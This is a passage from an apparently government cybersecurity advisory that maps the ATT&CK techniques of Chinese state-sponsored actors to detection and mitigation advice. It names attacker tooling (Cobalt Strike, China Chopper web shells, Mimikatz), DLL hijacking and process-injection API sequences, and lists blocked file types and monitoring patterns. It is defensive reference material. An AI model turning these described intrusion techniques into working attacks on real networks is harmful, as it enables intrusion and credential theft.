[[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html >)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.\n| \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors\u2019 Defensive Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being 